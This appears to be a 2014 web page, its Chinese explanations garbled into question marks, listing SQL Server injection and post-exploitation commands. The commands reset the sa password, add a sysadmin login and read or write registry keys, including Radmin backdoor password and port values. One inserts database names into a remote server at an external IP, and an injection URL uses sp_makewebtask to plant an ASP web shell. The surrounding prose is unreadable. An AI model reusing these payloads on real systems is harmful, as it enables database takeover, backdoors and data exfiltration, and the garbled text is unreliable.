SQL??????????
???????????? ???????[ 2014/4/24 11:07:18 ] ???????????????? SQL ???
????д????
????exec master..xp_regwrite 'HKEY_LOCAL_MACHINE'??'SOFTWAREMicrosoftJet4.0Engines'??'SandBoxMode'??'REG_DWORD'??1
????REG_SZ
??????????
????exec master..xp_regread 'HKEY_LOCAL_MACHINE'??'SOFTWAREMicrosoftWindows NTCurrentVersionWinlogon'??'Userinit'
?????????????
????exec master..xp_dirtree 'c:winntsystem32'??1??1
???????????
????backup database pubs to disk = 'c:123.bak'
????//????????
????And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
????????sa??????????sql??????ù???????????????
????exec sp_password NULL??'??????'??'sa'
??????????????SA???????test??
????exec master.dbo.sp_addlogin test??ptlove
????exec master.dbo.sp_addsrvrolemember test??sysadmin
???????????洢??????xp_cmdshell?????:
????exec sp_dropextendedproc 'xp_cmdshell'
???????????洢??????
????EXEC [master]..sp_addextendedproc 'xp_proxiedadata'?? 'c:winntsystem32sqllog.dll'
????GRANT exec On xp_proxiedadata TO public
?????????????????
????exec master..xp_servicecontrol 'stop'??'schedule'
????exec master..xp_servicecontrol 'start'??'schedule'
????dbo.xp_subdirs
?????????????μ???????
????xp_getfiledetails 'C:InetpubwwwrootSQLInjectlogin.asp'
????dbo.xp_makecab
????????????????????????????????
??????????????????????????????е?????????????
????dbo.xp_makecab
????'c: est.cab'??'mszip'??1??
????'C:InetpubwwwrootSQLInjectlogin.asp'??
????'C:InetpubwwwrootSQLInjectsecurelogin.asp'
????xp_terminate_process
??????????????е???????????????? Process ID??
????????”?????????”???????????????-???????Ρ???? pid??????????????г???? Process ID
????xp_terminate_process 2484
????xp_unpackcab
?????????????
????xp_unpackcab 'c: est.cab'??'c: emp'??1
??????????????radmin????????????regedit.exe???????????????????????net.exe?????????а????regedit /e ????????????????mssql??sa??????????????? EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE'??'SYSTEMRAdminv2.0ServerParameters'??'Parameter'??'REG_BINARY'??0x02ba5e187e2589be6f80da0046aa7e3c ????????????12345678???????????? EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE'??'SYSTEMRAdminv2.0ServerParameters'??'port'??'REG_BINARY'??0xd20400 ????????1234
????create database lcx;
????Create TABLE ku(name nvarchar(256) null);
????Create TABLE biao(id int NULL??name nvarchar(256) null);
????//??????????
????insert into opendatasource('sqloledb'??'server=211.39.145.163??1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
????//??Master?д?????????????????
????Create TABLE master..D_TEST(id nvarchar(4000) NULL??Data nvarchar(4000) NULL);--
?????? sp_makewebtask?????web????д????仰???
????http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:www t88.asp'??'%20select%20''<%25execute(request("a"))%25>''%20';--
????//???±?????
????Update films SET kind = 'Dramatic' Where id = 123
????//???????
????delete from table_name where Stockid = 3
??????
???·???
??????????????????
2023/3/23 14:23:39???д?ò??????????
2023/3/22 16:17:39????????????????????Щ??
2022/6/14 16:14:27??????????????????????????
2021/10/18 15:37:44???????????????
2021/9/17 15:19:29???·???????·
2021/9/14 15:42:25?????????????
2021/5/28 17:25:47??????APP??????????
2021/5/8 17:01:11
sales@spasvo.com